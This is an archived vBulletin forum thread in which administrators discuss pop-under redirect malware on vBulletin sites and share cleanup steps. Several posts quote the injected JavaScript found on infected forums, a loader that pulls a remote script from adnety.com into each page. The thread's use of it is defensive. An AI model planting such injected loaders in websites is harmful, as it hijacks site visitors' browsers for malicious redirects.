vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB4 Programming Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=252)
-   -   Pop Unders with false click..! (https://vborg.vbsupport.ru/showthread.php?t=323611)

socialteenz 10-11-2016 07:27 PM
Pop Unders with false click..!
 
So, basically i have been noticing many vb forums affected by this pop under malware..

What happens is, when you make a click on your site, the pop under appears and it redirects you to these sites..

adnety.com
clicknety.com
namefuze.com

Affected vBulletin Sites so far..

http://www.neogaf.com/forum/showthread.php?t=1229205&page=28

http://www.tsptalk.com/mb/report-problems/26162-pop-ups-anyone-still-seeing-them.html?

http://www.contractortalk.com/f45/virus-pop-up-301393/

https://forums.rajah.com/showthread.php?151343-Pop-ups


FIX:


Quote:
Originally Posted by Trevor Hannant (Post 2576857)
Generally, we've found these have been caused by a rogue plugin installed under the 'vBulletin' product. Anyone else with this issue should check there in the first instance and delete it if there is one.

Best Practices...


1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

2) Check your plugins list for any that are not part of a product you've added:

AdminCP > Plugins & Products > Plugin Manager

Any listed under 'vBulletin' at the top of the list should be examined carefully and removed if you're unsure as to what they are.

3) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

4) Update the following passwords in addition to your AdminCP:

- FTP
- Database

When updating the database password, ensure you also change your config.php file to use the new password otherwise your site won't be able to connect to the database.

5) Secure your AdminCP directory via .htaccess/.htpasswd.

Credits: Trevor Hannant

TheLastSuperman 10-11-2016 07:33 PM
More than likely hidden in a file, called via referencing a url... could or could not be in base64 format i.e. encrypted per say from reading heck not sure, will know more once I run into this first-hand as with all this crud these terd-nuggets (hacker folks) come up with :p.

socialteenz 10-11-2016 07:35 PM
Update:

The temporary fix to this issue is by disabling the plugin system.

Code:
define('DISABLE_HOOKS', true);

TheLastSuperman 10-11-2016 07:40 PM
This code is at the top of two of your sites listed, I'd check for that on the site you have access to.

On one site:
Code:
<script type="text/javascript">
var win = [];
win['webid'] = '22357fb864e954c229';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() {
var pGTP = document.createElement('script'); pGTP.type = 'text/javascript'; pGTP.async = true;
var selectGtp = document.getElementsByTagName('script')[0];
pGTP.src = 'https://adnety.com/dashboard/call.js';
selectGtp.parentNode.insertBefore(pGTP, selectGtp);
})();
</script>
From a completely different site, similar code:
Code:
<script type="text/javascript">
var win = [];
win['webid'] = '78557fb86330ee36940';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() {
var pGTP = document.createElement('script'); pGTP.type = 'text/javascript'; pGTP.async = true;
var selectGtp = document.getElementsByTagName('script')[0];
pGTP.src = 'https://adnety.com/dashboard/call.js';
selectGtp.parentNode.insertBefore(pGTP, selectGtp);
})();
</script>

socialteenz 10-11-2016 07:51 PM
The site which i have access is undergoing server update, i will get you the details once it's done.

This was the code found on their site..

Code:
<script type="text/javascript"> 
var win = [];
win['webid'] = '46157fb85796a03666';
win['traffic'] = '0';
win['raw'] = '2'; 
win['pop'] = '0';
(function() {  var pGTP = document.createElement('script');
pGTP.type = 'text/javascript'; pGTP.async = true; 
var selectGtp = document.getElementsByTagName('script')[0]; 
pGTP.src = 'https://adnety.com/dashboard/call.js'; 
selectGtp.parentNode.insertBefore(pGTP, selectGtp);  })();  </script>

TheLastSuperman 10-11-2016 07:53 PM
Quote:
Originally Posted by socialteenz (Post 2576843)
The site which i have access is undergoing server update, i will get you the details once it's done.

This was the code found on their site..

PHP Code:
<script type="text/javascript">  var win = [];  win['webid'] = '46157fb85796a03666';  win['traffic'] = '0';  win['raw'] = '2';  win['pop'] = '0';  (function() {  var pGTP document.createElement('script'); pGTP.type 'text/javascript'pGTP.async true;  var selectGtp document.getElementsByTagName('script')[0];  pGTP.src 'https://adnety.com/dashboard/call.js';  selectGtp.parentNode.insertBefore(pGTPselectGtp);  })();  </script
Looks identical to the ones I also found, so look for how that was added or injected, what is in that area of the page on the back-end of the site? A Hook location or what? Trace it down that way ;). Also once removed check in a day or so and one solid week after to ensure it wasn't added again i.e. shell script left on the site OR code in a file that allows the code to be re-inserted etc etc.

While I find this interesting I'm terribly busy today so I may not be back to comment again for a few hours, catch up is my name at the moment (lol).

socialteenz 10-11-2016 07:56 PM
Quote:
Originally Posted by TheLastSuperman (Post 2576844)
Looks identical to the ones I also found, so look for how that was added or injected, what is in that area of the page on the back-end of the site? A Hook location or what? Trace it down that way ;). Also once removed check in a day or so and one solid week after to ensure it wasn't added again i.e. shell script left on the site OR code in a file that allows the code to be re-inserted etc etc.

While I find this interesting I'm terribly busy today so I may not be back to comment again for a few hours, catch up is my name at the moment (lol).
Sure, thanks for the info.

I am super sleepy as well, 3:25AM at my side of the world.

Trevor Hannant 10-12-2016 08:21 AM
Generally, we've found these have been caused by a rogue plugin installed under the 'vBulletin' product. Anyone else with this issue should check there in the first instance and delete it if there is one.

socialteenz 10-12-2016 06:57 PM
Quote:
Originally Posted by Trevor Hannant (Post 2576857)
Generally, we've found these have been caused by a rogue plugin installed under the 'vBulletin' product. Anyone else with this issue should check there in the first instance and delete it if there is one.
Yup, right on.

Thanks.


All times are GMT. The time now is 02:52 PM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01116 seconds
  • Memory Usage 1,752KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (4)bbcode_code_printable
  • (1)bbcode_php_printable
  • (4)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (9)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete